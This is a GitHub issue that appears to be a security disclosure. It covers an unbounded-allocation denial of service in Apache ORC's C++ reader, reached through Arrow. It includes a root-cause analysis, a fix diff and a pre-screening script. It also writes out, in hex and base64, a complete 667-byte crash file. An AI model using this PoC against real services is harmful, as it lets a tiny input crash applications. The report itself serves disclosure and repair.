OwenSanzas opened a new issue, #2650:
URL: https://github.com/apache/orc/issues/2650

   
   ## Summary
   
   A 667-byte crafted ORC file makes `arrow::adapters::orc::ORCFileReader::Open`
   attempt a ~57 TB heap allocation while decoding the file footer, because the
   bundled liborc reader trusts the attacker-supplied PostScript
   `compression_block_size` with no upper bound. Any application that opens an
   untrusted ORC file through Arrow's public ORC reader can be driven into an
   out-of-memory abort / denial of service by a tiny input.
   
   The defective code is in the bundled **Apache ORC** C++ library (liborc),
   reachable through Arrow's public API. The fix belongs in apache/orc; this
   report should be filed against **apache/orc** as well as apache/arrow (which
   bundles it). Tested at apache/arrow pinned commit
   `16fe34250a2ef261790b9cc414fdf0831669cf9f` (25.0.0-SNAPSHOT;
   `ARROW_DEPENDENCY_SOURCE=BUNDLED` -> orc-format 1.1.1).
   
   ## Root Cause
   
   The ORC PostScript carries a `compression_block_size` (`uint64`). When liborc
   decodes the footer it reads this field verbatim and feeds it straight into a
   decompression-buffer allocation that happens **before any compressed data is
   read**, so the entire attacker-declared block size is allocated up front:
   
   - `getCompressionBlockSize()` returns `ps.compression_block_size()` with no
     bound check (only a 256 KiB default when the field is absent):
     `c++/src/Reader.cc:59`.
   - `readFooter()` passes that value as the `blockSize` argument to
     `createDecompressor()`: `c++/src/Reader.cc:1357`.
   - For `compression = ZLIB`, `createDecompressor()` builds a
     `ZlibDecompressionStream` (`c++/src/Compression.cc:1293`); its base
     `DecompressionStream` constructor eagerly constructs
     `outputDataBuffer(pool, bufferSize)`: `c++/src/Compression.cc:463`.
   - `DataBuffer<char>::reserve()` then calls
     `memoryPool_.malloc(sizeof(char) * newCapacity)` (`c++/src/MemoryPool.cc:106`)
     with `newCapacity` equal to the declared block size, before a single byte of
     footer is decompressed.
   
   Vulnerable code (`c++/src/Reader.cc:59`):
   
   ```cpp
   uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
     if (ps.has_compression_block_size()) {
       return ps.compression_block_size();   // attacker-controlled, unbounded
     } else {
       return 256 * 1024;
     }
   }
   ```
   
   Eager allocation (`c++/src/Compression.cc:463` -> `c++/src/MemoryPool.cc:106`):
   
   ```cpp
   // Compression.cc: DecompressionStream ctor allocates the full block up front
   DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> inStream,
                                            size_t bufferSize, MemoryPool& pool,
                                            ReaderMetrics* metrics)
       : pool(pool),
         input(std::move(inStream)),
         outputDataBuffer(pool, bufferSize),   // bufferSize == compression_block_size
         ...
   
   // MemoryPool.cc: reserve() mallocs the whole capacity before any data is read
   template <class T>
   void DataBuffer<T>::reserve(uint64_t newCapacity) {
     if (newCapacity > currentCapacity_ || !buf_) {
       ...
       buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
       currentCapacity_ = newCapacity;
     }
   }
   ```
   
   Call chain (attacker bytes -> fault):
   
   ```
   arrow::adapters::orc::ORCFileReader::Open        adapter.cc:568  (public API)
     -> ORCFileReader::Impl::Open                    adapter.cc:218
       -> orc::createReader                          Reader.cc:1421
         -> orc::readFooter                          Reader.cc:1357   getCompressionBlockSize(ps)
           -> orc::createDecompressor                Compression.cc:1293
             -> orc::ZlibDecompressionStream::ctor   Compression.cc:694
               -> orc::DecompressionStream::ctor     Compression.cc:463
                 -> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
                   -> orc::DataBuffer<char>::reserve  MemoryPool.cc:106  -> malloc(bufferSize)
   ```
   
   liborc never validates the declared block size against the remaining
   file / footer length before allocating.
   
   ## PoC
   
   A 667-byte crafted ORC file: a valid `ORC` magic plus a PostScript declaring
   `compression = ZLIB` and an attacker-chosen `compression_block_size`
   (`0x33ffdbbd0000` ~ 57 TB after the buffer math).
   
   ```python
   # generate_poc.py — re-create the crash input from bytes
   import binascii
   
   POC_HEX = (
       "4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
       "1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
       "e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
       "00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
       "00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
       "fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
       "08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
       "100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
       "3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
       "800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
       "ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
       "25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
       "010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
       "d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
       "cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
       "3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
       "f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
       "01188080f4ddfdff0c2865300682f403034f524318"
   )
   data = binascii.unhexlify(POC_HEX)
   assert len(data) == 667, len(data)
   # Use a context manager so the file is flushed and closed deterministically.
   with open("poc.bin", "wb") as f:
       f.write(data)
   ```
   
   Crash input size: 667 bytes (`poc/poc.bin`, md5 `ec35f54cd76777e4f34f68f79c714a4e`).
   The PostScript declares `compression_block_size` such that the decompression
   buffer math requests `0x33ffdbbd0000` (~57 TB).
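
   As a cross-check on the size quoted above, the following sketch encodes
   `0x33ffdbbd0000` as a protobuf varint under PostScript field 3 and looks for
   it in the last 25 bytes of the hex dump. It assumes that
   `compressionBlockSize` is field number 3 of the ORC PostScript message and
   that the final byte of an ORC file is the PostScript length. `POC_TAIL`,
   `BLOCK_SIZE` and `encode_varint` are names introduced here for illustration
   and are not part of the original PoC.

```python
# Last 25 bytes of POC_HEX above: a 24-byte PostScript plus its length byte (0x18).
POC_TAIL = bytes.fromhex("08b7011001188080f4ddfdff0c2865300682f403034f524318")

BLOCK_SIZE = 0x33FFDBBD0000  # allocation size reported by AddressSanitizer


def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while True:
        low7 = value & 0x7F
        value >>= 7
        if value:
            out.append(low7 | 0x80)  # continuation bit: more bytes follow
        else:
            out.append(low7)
            return bytes(out)


# Tag for field 3 with wire type 0 (varint) is (3 << 3) | 0 = 0x18.
# Assumption: compressionBlockSize is PostScript field 3.
field = bytes([(3 << 3) | 0]) + encode_varint(BLOCK_SIZE)

print(field.hex())             # encoded tag + value
print(field in POC_TAIL[:-1])  # is that byte sequence present in the PostScript?
print(f"{BLOCK_SIZE} bytes = {BLOCK_SIZE / 10**12:.2f} TB = {BLOCK_SIZE / 2**40:.2f} TiB")
```

   If the assumptions hold, the encoded field `18 80 80 f4 dd fd ff 0c` is found
   in the PostScript, which suggests the declared `compression_block_size` is
   itself `0x33ffdbbd0000`: about 57.17 TB in decimal units, or roughly 52 TiB.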
   
   ## Reproduction
   
   Build Arrow C++ from source with `-DARROW_ORC=ON` and AddressSanitizer, then
   open the attached ORC file through the public reader API:
   
   ```cpp
   #include <arrow/adapters/orc/adapter.h>
   // auto in = ...read poc.bin into a RandomAccessFile...;
   auto reader = arrow::adapters::orc::ORCFileReader::Open(
       in, arrow::default_memory_pool());  // huge alloc here
   ```
   
   liborc's `getCompressionBlockSize()` returns the attacker-controlled PostScript
   `compression_block_size` with no upper bound, and that value reaches
   `DataBuffer<char>::reserve()` -> `malloc`. AddressSanitizer reports:
   
   ```
   AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds maximum supported size
     DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
     ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)
   ```
   
   All of this is triggered by a 667-byte ORC file. The fix belongs in Apache ORC
   (liborc `getCompressionBlockSize`), which is reached via the Arrow ORC reader.
   The PoC can be recreated from the base64 below.
   
   ## Suggested Fix
   
   The fix belongs in **Apache ORC (liborc)**, since the unbounded allocation lives
   there. Validate the declared `compression_block_size` against a sane upper bound
   and/or against the remaining footer/file length before constructing the
   decompression buffer, rejecting the file with a parse error otherwise. The check
   belongs in `getCompressionBlockSize()` (`Reader.cc:59`) or at the
   `createDecompressor` call site in `readFooter()` (`Reader.cc:1357`), so no caller
   can hand an unbounded `bufferSize` to `DecompressionStream`:
   
   ```diff
    uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
      if (ps.has_compression_block_size()) {
   -    return ps.compression_block_size();
   +    uint64_t blockSize = ps.compression_block_size();
   +    // A compression block can never legitimately exceed the input; cap it so a
   +    // malicious PostScript cannot force an unbounded up-front allocation.
   +    if (blockSize > kMaxCompressionBlockSize) {
   +      throw ParseError("Invalid compression block size in PostScript");
   +    }
   +    return blockSize;
      } else {
        return 256 * 1024;
      }
    }
   ```
   
   (The exact bound is upstream's judgement.) Apache Arrow should pick up the fix
   when it bumps the bundled liborc; until then Arrow may also consider bounding the
   allocation at the adapter layer.
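
   Until a fixed liborc is available, an application could also pre-screen
   untrusted files before handing them to the reader. The sketch below is one
   hedged way to do that: it parses only the PostScript at the end of the file
   and rejects a declared block size above a cap. It assumes that
   `compressionBlockSize` is PostScript field 3 and that the last byte of the
   file is the PostScript length. `ASSUMED_MAX_BLOCK_SIZE`, `read_varint`,
   `declared_block_size` and `screen` are hypothetical names, and the 8 MiB cap
   is an assumption (ORC chunk headers carry a 23-bit length), not a value
   chosen by upstream.

```python
from typing import Optional, Tuple

# Hypothetical cap, not an upstream constant. Assumption: ORC chunk headers
# hold a 23-bit length, so no legitimate block should need more than 8 MiB.
ASSUMED_MAX_BLOCK_SIZE = 1 << 23


def read_varint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode one protobuf varint at pos; return (value, next position)."""
    value = 0
    shift = 0
    while pos < len(buf):
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7
    raise ValueError("truncated varint in PostScript")


def declared_block_size(data: bytes) -> Optional[int]:
    """Return PostScript field 3 (compressionBlockSize), or None if absent."""
    if not data or data[-1] + 1 > len(data):
        raise ValueError("file too short to hold its PostScript")
    ps = data[len(data) - 1 - data[-1]:-1]  # last byte is the PostScript length
    pos = 0
    while pos < len(ps):
        tag, pos = read_varint(ps, pos)
        field, wire_type = tag >> 3, tag & 7
        if wire_type == 0:  # varint field
            value, pos = read_varint(ps, pos)
            if field == 3:
                return value
        elif wire_type == 2:  # length-delimited field (e.g. version, magic)
            length, pos = read_varint(ps, pos)
            pos += length
        else:
            raise ValueError(f"unexpected wire type {wire_type} in PostScript")
    return None


def screen(data: bytes, cap: int = ASSUMED_MAX_BLOCK_SIZE) -> None:
    """Raise ValueError if the declared block size exceeds the cap."""
    size = declared_block_size(data)
    if size is not None and size > cap:
        raise ValueError(f"compression_block_size {size:#x} exceeds cap {cap:#x}")
```

   Called on the bytes of `poc.bin`, `screen()` should raise, while a file that
   declares the 256 KiB default passes. This is only a stopgap at the application
   layer; it does not replace the bound check in liborc itself.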
   
   ## PoC bytes (self-contained)
   
   The trigger input is **667 bytes** (`poc/poc.bin`).
   Recreate it exactly with:
   
   ```bash
   base64 -d > poc.bin <<'B64'
   T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
   AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
   AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
   OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
   g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
   42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
   rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
   g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
   CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
   B64
   ```
   
   ## Credit
   
   Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
   

